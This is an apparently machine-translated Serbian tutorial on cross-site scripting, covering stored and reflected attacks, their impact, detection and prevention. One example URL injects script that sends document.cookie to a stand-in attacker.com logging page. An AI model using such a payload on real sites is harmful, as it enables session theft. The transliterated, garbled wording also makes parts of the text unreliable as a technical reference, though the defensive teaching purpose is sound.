✅ Шта је цросс сите скрипту? - Како то ради - Утицај и врсте крижног места

Увод у скрипта на више места

Увод у скрипта на више места

Са повећањем броја веб апликација на Интернету, безбедност веба постала је важна брига. Хаковање и крађа приватних података корисника је сада уобичајено и пријети им да користе било коју апликацију. Цросс Сите Сцриптинг један је од популарних напада на веб безбедност корисника. Доносимо увид у то што је скрипт на више места.
Цросс Сите Сцриптинг назван КССС, представља рачунарску безбедносну рањивост у којој нападач има за циљ да дода мало злонамерног кода у облику скрипти у поуздану веб страницу / веб страницу. То је напад убризгавања кода на страни клијента и злонамерна скрипта се извршава на веб претраживачу корисника када приступи тој веб страници / веб страници. Индиректно та веб локација постаје медиј за слање злонамерног кода кориснику. Убризгавањем скрипти нападачи заобилазе ДОМ (Доцумент Објецт Модел) сигурносних ограничења и добивају приступ садржају осетљиве странице корисника, сесијским колачићима, историји прегледа већине приватних података које одржава претраживач.
Веб локација која садржи форуме, табле са огласима, веб странице које дозвољавају коментаре и оне који користе неатитисани унос корисника и тако произведен излаз су најосетљивији на КССС нападе. Иако су напади КССС могући у ВБСцрипт-у, АцтивеКс-у и ЦСС-у, они су најчешћи у Јавасцрипт-у као његовом основном искуству приликом прегледавања.

Различите врсте скрипта на различитим локацијама (КССС)

Иако не постоји посебна класификација крижног веб локације, неки стручњаци су је класификовали у две врсте које су детаљније размотрене у наставку:

Сачувани КССС напади :

Похрањени КССС су они код којих се злонамјерна скрипта коју убризгава нападач похрањује у базу података и покреће се у прегледачу корисника када покуша приступити бази података у неком облику. Они су такође познати као трајни или чувани КССС. Ово је један од најразорнијих напада и дешава се посебно када веб страница / веб страница дозвољава коментарисање или дозвољава уградњу ХТМЛ садржаја.
Нападач додаје ЈаваСцрипт у коментару који се чува у бази података и када корисник приступи страници на којој је погођена и дохваћа податке из базе података, па се у његовом прегледачу покреће злонамерна скрипта и тај нападач добија неовлаштени приступ приватним подацима корисника.
На пример, на веб локацији за електроничку трговину, попут Олк-а, која садржи неатитисани оквир за опис производа, нападач који је продавац производа додаје у њега злонамерни ЈаваСцрипт и биће смештен у базу података веб локације.
Када купац отвори опис производа како би приказао детаље производа, сада ће постати жртва јер се скрипта извршава у његовом веб претраживачу, а сви детаљи корисника који претраживач дозвољава ће бити отети.

Процедура КССС напада:

Ово је један од најчешћих начина на који нападач може изазвати КССС напад на корисника. У основи, у КССС нападима, нападач циља жртву слањем е-поште, злонамерне везе или додавањем низа у резултате претраге који упућује на веродостојно веб место, али садржи злонамерни ЈаваСцрипт код.
Ако жртва кликне на тај УРЛ, покреће ХТТП захтев и она шаље захтев рањивој веб апликацији. Захтев се затим враћа жртви са одговором уграђеног ЈаваСцрипта који веб прегледач извршава сматрајући да долази са веродостојне веб локације резултира отмицом поверљивих података његовог прегледача.
На пример, на веб локацији за електроничку трговину постоји оквир за претрагу у којем корисник може претраживати ставке, а низ написан у пољу за претрагу видљив је у УРЛ-у веб локације када се захтев за претрагу пошаље серверу.
Нападач ствара везу у којој се злонамерна скрипта повезује у УРЛ адресу и шаље је жртви е-поштом. Када жртва отвори ту везу, захтев се шаље на злонамерну веб локацију нападача, а сви подаци прегледача жртве су отети и послати у систем нападача.

Како функционира скрипту на различитим локацијама (КССС)?

У рањивости Цросс Сите Сцриптинг (КССС), главни мотив нападача је да украде податке корисника покретањем злонамерне скрипте у свом прегледачу која се убризгава у садржај веб локације који корисник користи на различите начине.
На пример, када корисник тражи неки текст на веб локацији, захтев се шаље серверу у облику:

хттпс://ввв.абцвебсите.цом/сеарцх?к=тект1

У резултату претраге веб локација враћа резултат заједно са оним што је корисник претраживао, попут:

Тражили сте: тект1

Ако је функционалност претраживања рањива за КССС, нападач може у УРЛ додати злонамерну скрипту:

хттпс://ввв.абцвебсите.цом/сеарцх= локација документа = хттпс: //аттацкер.цом/лог.пхп? ц = '+ енцодеУРИЦомпонент (доцумент.цоокие)

Када жртва кликне на ову везу, преусмерава се на злонамерну веб локацију, тј. Хттпс://аттацкер.цом, а сви подаци прегледача директно се шаљу на рачунар нападача што резултира тиме да нападач украде све сексенске / колачке сесије.
На овај начин нападач убризга своју злонамерну скрипту у УРЛ адресу, Аттацкер такође може да похрани ту скрипту на сервер који се налази под Сторед КССС.

Утицај рањивости на различитим локацијама скрипта:

Утицај скрипта на различитим локацијама увелико варира. Након што искористи рањивост КССС, нападач добија потпуну контролу над прегледником жртве и може да извршава различите радње које се разликују од малих као што је гледање историје прегледача до катастрофалних као што је уметање црва у рачунар.

Неке од радњи које нападач може извршити искориштавањем КССС рањивости су следеће: -

Пропуштање осетљивих информација попут корисничког имена и лозинке.
Уметање глиста у рачунар.
Преусмеравање корисника на неку опасну веб локацију и присиљавање на обављање неких радњи
Приступите историји прегледа жртве.
Инсталација програма Тројански коњ.
Присилите корисника да извршава и мења вредности у апликацији тако што ће стећи приступ

Проналажење рањивости на различитим локацијама:

КССС рањивости настају из два разлога или унос од корисника није потврђен пре слања на сервер или излаз примљен у прегледач није кодиран ХТМЛ-ом. Имајући у виду катастрофалан утицај КССС рањивости и штитећи приватност корисника, врло је важно открити да ли је веб апликација рањива на КССС или не.
Иако је КССС тешко идентифицирати и уклонити, најбољи начин провјере је извршити сигурносни преглед кода и провјерити има ли на свим мјестима гдје се унос из ХТТП захтјева може приказати као излаз у апликацији. Употреба алата за аутоматско скенирање рањивости који укључују специјализовани КССС модул за скенирање за скенирање целе веб апликације такође може помоћи у скенирању и проналажењу рањивости у апликацији.

Због Превент КССС?

КССС је рањивост убризгавања кода, тако да је веома важно кодирање података који се шаљу серверу и података који долазе са сервера у прегледач корисника.
Валидација података је такође веома важна тако да прегледач интерпретира код без икаквих злонамерних команди. Уведене су различите методе превенције, чиме се валидација података и кодирање воде као приоритет да би веб локација била подложна КССС.

Неке тачке треба усредсредити да спрече КССС: -

Подршка ХТТП Трацеа на свим веб серверима треба искључити јер нападач може украсти колачиће и податке приватног прегледача путем ХТТП позива у траг са сервера, чак и ако је документ.цоокие онемогућен у прегледачу жртве.
Програмери требају санитирати унесене податке и никада не би требали излазити податке директно примљене од корисника без провјере ваљаности.
Везе би углавном требале бити недозвољене ако не започињу протоколима са беле листе као што су ХТТП: //, хттпс: // и на тај начин спречавају употребу УРИ схема као што је јавасцрипт: //

Закључак:

КССС напади су опасни и могу наштетити приватности корисника и украсти податке уколико нормални корисник пажљиво не прегледа апликацију. Дакле, програмери током развоја апликације треба да се придржавају строгих безбедносних правила, посебно за податке и за сервер, тако да је апликација најмање рањива на КССС и више корисника се може ослонити на њу.

Препоручени чланци

Ово је водич за шта је скрипта на више места ?. Овде смо разговарали о различитим врстама унакрсних локација, раду, утицају и спречавању КССС, респективно. Можете и да прођете кроз друге наше предложене чланке да бисте сазнали више -

Како функционише ЈаваСцрипт
Шта је лажни напад?
Шта је цибер напад?
ХТТП кеширање
Како колачићи раде у ЈаваСцрипт-у са примером?

Категорија:

Развој софтвера

Шта је цросс сите скрипту? - Како то ради - Утицај и врсте крижног места

Увод у скрипта на више места

Различите врсте скрипта на различитим локацијама (КССС)

Сачувани КССС напади :

Процедура КССС напада:

Како функционира скрипту на различитим локацијама (КССС)?

Утицај рањивости на различитим локацијама скрипта:

Проналажење рањивости на различитим локацијама:

Због Превент КССС?

Закључак:

Препоручени чланци

Топ банке у Луксембургу - Водич за 10 најбољих банака у Луксембургу

Најбоље банке у Кувајту - Преглед и водич за 10 најважнијих банака у Кувајту

Банке у Немачкој - Преглед и водич за 10 најбољих банака у Немачкој

Банке у Макауу - Преглед и водич за 10 најбољих банака у Макау

Како створити снег у Пхотосхоп ЦЦ и ЦС6

Како побољшати фотографију заласка сунца помоћу Пхотосхопа - корак по корак

Како створити ефекат акварелне слике у Пхотосхопу - корак по корак

Дизајни и обрасци за окретање, ротацију и зрцало у Пхотосхопу

Сплунк вс Нагиос - Пронађите 7 важних поређења

Питања за интервју са пролећним чизмама - Топ 10 најкориснијих питања

Разврставање у Таблеау - Детаљне илустрације сортирања у Таблеау-у

Спринг Цлоуд вс Спринг Боот - Најбољи оквир за стварање микросервиса

Увод у скрипта на више места

Различите врсте скрипта на различитим локацијама (КССС)

Сачувани КССС напади :

Процедура КССС напада:

Како функционира скрипту на различитим локацијама (КССС)?

Утицај рањивости на различитим локацијама скрипта:

Проналажење рањивости на различитим локацијама:

Због Превент КССС?

Закључак:

Препоручени чланци

Опширније